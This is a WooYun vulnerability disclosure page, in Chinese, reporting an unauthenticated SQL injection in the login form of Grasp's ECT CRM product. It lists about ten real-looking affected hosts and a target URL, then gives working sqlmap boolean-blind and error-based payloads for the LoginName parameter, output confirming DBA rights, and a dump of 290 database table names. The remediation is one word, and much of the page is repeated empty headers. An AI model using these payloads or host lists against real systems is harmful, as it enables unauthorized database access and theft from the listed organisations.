任我行ECT存在SQL注入(无需登录) | wooyun-2015-0105065| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0105065

漏洞标题：任我行ECT存在SQL注入(无需登录)

漏洞作者：路人甲

提交时间：2015-04-01 10:57

修复时间：2015-07-05 10:59

公开时间：2015-07-05 10:59

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-04-01：细节已通知厂商并且等待厂商处理中
2015-04-06：厂商主动忽略漏洞，细节向第三方安全合作伙伴开放
2015-05-31：细节向核心白帽子及相关领域专家公开
2015-06-10：细节向普通白帽子公开
2015-06-20：细节向实习白帽子公开
2015-07-05：细节向公众公开

简要描述：

详细说明：

任我行ECT （企业“管人管事”执行管控工具）
登录框存在post注入。。DBA权限。
案例：

http://120.31.62.218/
http://crm.netzone.com/
http://121.9.201.153/
http://221.10.14.66/zhang/
http://61.184.240.105/crm/
http://crm.ec3s.com/
http://crm.kx8.cn/
http://crm.techray.com.cn/
http://tianzhengtaisheng.3322.org/crm/
http://www.hanna.com.cn:956/

http://crm.netzone.com/VerifyUser.asp

漏洞证明：

sqlmap identified the following injection points with a total of 45 HTTP(s) requests:
---
Parameter: LoginName (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: LoginName=admin' AND 6853=6853 AND 'XQMw'='XQMw&Password=admin&Validatepwds=&LockNum=err&UserRank=0
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: LoginName=admin' AND 4996=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(112)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (4996=4996) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(122)+CHAR(106)+CHAR(113))) AND 'kmly'='kmly&Password=admin&Validatepwds=&LockNum=err&UserRank=0
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2008
current database:    'grasp_crm'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: LoginName (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: LoginName=admin' AND 6853=6853 AND 'XQMw'='XQMw&Password=admin&Validatepwds=&LockNum=err&UserRank=0
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: LoginName=admin' AND 4996=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(112)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (4996=4996) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(122)+CHAR(106)+CHAR(113))) AND 'kmly'='kmly&Password=admin&Validatepwds=&LockNum=err&UserRank=0
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2008
current user is DBA:    True
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: LoginName (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: LoginName=admin' AND 6853=6853 AND 'XQMw'='XQMw&Password=admin&Validatepwds=&LockNum=err&UserRank=0
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: LoginName=admin' AND 4996=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(112)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (4996=4996) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(122)+CHAR(106)+CHAR(113))) AND 'kmly'='kmly&Password=admin&Validatepwds=&LockNum=err&UserRank=0
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2008
Database: grasp_crm
[290 tables]
+------------------------------------+
| CRM_Activity                       |
| CRM_ActivityClassification1        |
| CRM_ActivityClassification2        |
| CRM_ActivityClassification3        |
| CRM_ActivityCoEmployee             |
| CRM_ActivityRecord                 |
| CRM_ActivityStyle                  |
| CRM_AllCanReport                   |
| CRM_AllCanReportIndex              |
| CRM_AllCanReportUserList           |
| CRM_BBS                            |
| CRM_BBSChannel                     |
| CRM_BBSVoteDetail                  |
| CRM_BbsColumn                      |
| CRM_BbsColumnStyle                 |
| CRM_BbsNotify                      |
| CRM_BbsRight                       |
| CRM_BbsRightTempletDetail          |
| CRM_BbsSubscribe                   |
| CRM_BbsUserInfo                    |
| CRM_BbsVote                        |
| CRM_BusinessActivity               |
| CRM_BusinessActivityStyle          |
| CRM_ChatInfo                       |
| CRM_ChatOnlineUser                 |
| CRM_ChatRoomInfo                   |
| CRM_CoEmail                        |
| CRM_CoObject                       |
| CRM_CoObjectRelation               |
| CRM_Commodity                      |
| CRM_CommodityClassification1       |
| CRM_CommodityClassification2       |
| CRM_CommodityClassification3       |
| CRM_CommodityGallery               |
| CRM_CompanyContect                 |
| CRM_ConstDefineCusSetting          |
| CRM_ContractClassfication1         |
| CRM_ContractClassfication2         |
| CRM_ContractCoEmployee             |
| CRM_ContractManage                 |
| CRM_ContractRecord                 |
| CRM_CustomConfig                   |
| CRM_CustomConfigNew                |
| CRM_CustomHtml                     |
| CRM_CustomImformation              |
| CRM_CustomTable1                   |
| CRM_CustomTable2                   |
| CRM_CustomTable3                   |
| CRM_CustomTableCoObject            |
| CRM_DataRight                      |
| CRM_DataSyncMapInfo                |
| CRM_DataSyncTaskDetail             |
| CRM_DayMotto                       |
| CRM_Department                     |
| CRM_DeskTopRecord                  |
| CRM_DispatchTask                   |
| CRM_DispatchTaskMsg                |
| CRM_DutyCoEmployee                 |
| CRM_DutyTable                      |
| CRM_Email                          |
| CRM_Employee                       |
| CRM_EmployeeIPConfig               |
| CRM_EmployeeStyle                  |
| CRM_ExMailAddresslist              |
| CRM_ExMailSetting                  |
| CRM_ExPanMailBox                   |
| CRM_Exam_feedbackshare             |
| CRM_ExpanRight                     |
| CRM_ExpanTableForTree              |
| CRM_Favorite                       |
| CRM_Fee                            |
| CRM_FeeClassification1             |
| CRM_FeeClassification2             |
| CRM_FeeCoEmployee                  |
| CRM_FeePlan                        |
| CRM_FeePlanItem                    |
| CRM_FeePostil                      |
| CRM_FeeStyle                       |
| CRM_Gallery                        |
| CRM_Help                           |
| CRM_HelpActivity                   |
| CRM_IPInfo                         |
| CRM_InterBatchAddDraft             |
| CRM_Interunit                      |
| CRM_InterunitClassification1       |
| CRM_InterunitClassification2       |
| CRM_InterunitClassification3       |
| CRM_InterunitClassification4       |
| CRM_InterunitClassification5       |
| CRM_InterunitClassification6       |
| CRM_InterunitClassification7       |
| CRM_InterunitClassification8       |
| CRM_InterunitCoShareInfo           |
| CRM_InterunitDraftDetial           |
| CRM_InterunitGallery               |
| CRM_InterunitMap                   |
| CRM_InterunitSaleTaskMoveLog       |
| CRM_InterunitShareInfo             |
| CRM_InterunitStyle                 |
| CRM_InterunitStyleRight            |
| CRM_InterunitTel                   |
| CRM_InterunitTelLog                |
| CRM_InterunitTemplet               |
| CRM_KpiCoForm                      |
| CRM_KpiExtraScore                  |
| CRM_KpiMain                        |
| CRM_KpiScore                       |
| CRM_KpiTable                       |
| CRM_KpiTableCoExaminee             |
| CRM_KpiTableCoScoreMan             |
| CRM_KpiTableItem                   |
| CRM_KpiTemplete                    |
| CRM_KpiTempleteItem                |
| CRM_Lable                          |
| CRM_Limit                          |
| CRM_LimitTemplet                   |
| CRM_LimitTempletNew                |
| CRM_LinkMan                        |
| CRM_LinkManClassification1         |
| CRM_LinkManDepartment              |
| CRM_LinkManWork                    |
| CRM_LoginUser                      |
| CRM_MeetingMessage                 |
| CRM_MeetingRec                     |
| CRM_Message                        |
| CRM_MessageNoRead                  |
| CRM_MessageUsedReceiver            |
| CRM_MobileMsgRecord                |
| CRM_MobileMsgTemp                  |
| CRM_ModifyInterUnit                |
| CRM_MsgReceiverGroup               |
| CRM_MyConcern                      |
| CRM_MyImportance                   |
| CRM_MyInstancy                     |
| CRM_MyPlan                         |
| CRM_MyPlanCoEmployee               |
| CRM_MyPlanStyle                    |
| CRM_MySelectCreator                |
| CRM_MyTask                         |
| CRM_MyTaskCoEmployee               |
| CRM_MyTaskColKpiDate               |
| CRM_MyTaskModifyRecord             |
| CRM_MyTaskPostil                   |
| CRM_MyTaskResualt                  |
| CRM_MyTaskStyle                    |
| CRM_MyTaskSummary                  |
| CRM_MyTaskSummaryPostil            |
| CRM_MyTaskView                     |
| CRM_NewCoMessage                   |
| CRM_Notepaper                      |
| CRM_ObjectLable                    |
| CRM_OnlineUser                     |
| CRM_OrderForm                      |
| CRM_OrderFormCoEmployee            |
| CRM_PPControl                      |
| CRM_PopuMsgCenter_Help             |
| CRM_PopuMsgCenter_News             |
| CRM_PopuMsgCenter_Schedule         |
| CRM_PreGetEmail                    |
| CRM_PreSendCoMail                  |
| CRM_ProPriceCoEmployee             |
| CRM_Project                        |
| CRM_ProjectClassification1         |
| CRM_ProjectClassification2         |
| CRM_ProjectClassification3         |
| CRM_ProvidePrice                   |
| CRM_ProvidePriceClassfication      |
| CRM_QuickGetNoReadMessage          |
| CRM_ReportAuditCoEmployee          |
| CRM_RightFunName                   |
| CRM_RoutineWork                    |
| CRM_RoutineWorkDetail              |
| CRM_RoutineWorkPerson              |
| CRM_SMSSigName                     |
| CRM_SMSmsgGroup                    |
| CRM_SaleTaskRecord                 |
| CRM_SalesAssistor                  |
| CRM_SalesCoCommodity               |
| CRM_SalesRegister                  |
| CRM_SalesRegisterRecord            |
| CRM_SalesStatus                    |
| CRM_SalesTarget                    |
| CRM_SalesTask                      |
| CRM_SalesTaskClassification1       |
| CRM_SalesTaskCommerce              |
| CRM_SalesTaskComplete              |
| CRM_SalesTaskDemand                |
| CRM_SalesTaskDetail                |
| CRM_SalesTaskGeneral               |
| CRM_SalesTaskPostile               |
| CRM_SalesTaskQuote                 |
| CRM_SalesTaskStyle                 |
| CRM_Schedule                       |
| CRM_ScheduleCoEmployee             |
| CRM_ScheduleCoFee                  |
| CRM_SchedulePostil                 |
| CRM_ScheduleType                   |
| CRM_SerialNumber                   |
| CRM_Service                        |
| CRM_ServiceAssistor                |
| CRM_ServiceClassification1         |
| CRM_ServiceClassification2         |
| CRM_ServiceClassification3         |
| CRM_ServiceKnowledge               |
| CRM_ServiceKnowledgeStyle          |
| CRM_ServiceManage                  |
| CRM_ServiceManageClassification1   |
| CRM_ServiceManageStyle             |
| CRM_ServiceNotice                  |
| CRM_ServiceNoticeClassification1   |
| CRM_ServiceNoticeClassification2   |
| CRM_ServiceNoticeCopyMan           |
| CRM_ServiceNoticeType              |
| CRM_ServicePostile                 |
| CRM_ServiceProcess                 |
| CRM_ServiceProcessClassification1  |
| CRM_ServiceReply                   |
| CRM_SolarData                      |
| CRM_SolarMonthData                 |
| CRM_SummaryForDayTask              |
| CRM_SummaryPostil                  |
| CRM_SystemParameter                |
| CRM_TaskCheckViewDetial            |
| CRM_Tellist                        |
| CRM_Template                       |
| CRM_UploadFile                     |
| CRM_UserConfig                     |
| CRM_UserLimitTempletMap            |
| CRM_UserLoginInfo                  |
| Exam_ExamCoExamer                  |
| Exam_ExamCoTemp                    |
| Exam_ExamerAnalysis                |
| Exam_Fillblank_Key                 |
| Exam_HXYConfig                     |
| Exam_HXY_CaseAndConsultationReport |
| Exam_HXY_Interunit1                |
| Exam_HXY_Interunit2                |
| Exam_HXY_Iter_Consu                |
| Exam_HXY_Recommendedtraining       |
| Exam_InviteRelations               |
| Exam_List                          |
| Exam_LoginUser                     |
| Exam_MainType                      |
| Exam_QuestionScore                 |
| Exam_SubjectItem                   |
| Exam_SubjectStore                  |
| Exam_Templet                       |
| Exam_TempletCoResult               |
| Exam_TempletCoResult_Array         |
| Exam_TempletCoResult_Fields        |
| Exam_TempletCoResult_ShowResults   |
| Exam_Templet_BigItem               |
| Exam_Templet_SmallItem             |
| WF_Copyer                          |
| WF_Examiner                        |
| WF_Instance                        |
| WF_Instance_StepInfo               |
| WF_Instance_StepInfoHis            |
| WF_Instance_Steps                  |
| WF_Instance_StepsHis               |
| WF_Main                            |
| WF_MainType                        |
| WF_NewFields                       |
| WF_NodeFlow                        |
| WF_NodeFlow_Condition              |
| WF_Nodes                           |
| WF_UserList                        |
| WF_Writor                          |
| dtproperties                       |
| vInterunitKeySearch                |
| vwCRM_Activity                     |
| vwCRM_BillProductDetail            |
| vwCRM_Interunit                    |
| vwCRM_InterunitAllCoObject         |
| vwCRM_InterunitForAll              |
| vwCRM_InterunitForLinkman          |
| vwCRM_InterunitForTelCall          |
| vwCRM_LinkmanDetail                |
| vwCRM_SaleTask                     |
| vwCRM_SaleTaskDetail               |
| vwCRM_SaleTaskDetail2              |
| vwCRM_Schedule                     |
| vwCRM_TeamSummary                  |
| vwCRM_VirtualProfitSalesRegister   |
| vwCRM_VirtualProfitSalesTask       |
| vwCRM_WFList                       |
| vwCRM_interunitForReport           |
| vw_LinkmanDefault                  |
| vw_UserDep                         |
| vw_UserInterunitStyle              |
+------------------------------------+

修复方案：

过滤

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2015-07-05 10:59

厂商回复：

漏洞Rank：4 (WooYun评价)

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0105065

漏洞标题：任我行ECT存在SQL注入(无需登录)

相关厂商：grasp.com.cn

漏洞作者：路人甲

提交时间：2015-04-01 10:57

修复时间：2015-07-05 10:59

公开时间：2015-07-05 10:59

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0105065

漏洞标题：任我行ECT存在SQL注入(无需登录)

相关厂商：grasp.com.cn

漏洞作者： 路人甲

提交时间：2015-04-01 10:57

修复时间：2015-07-05 10:59

公开时间：2015-07-05 10:59

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0105065"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云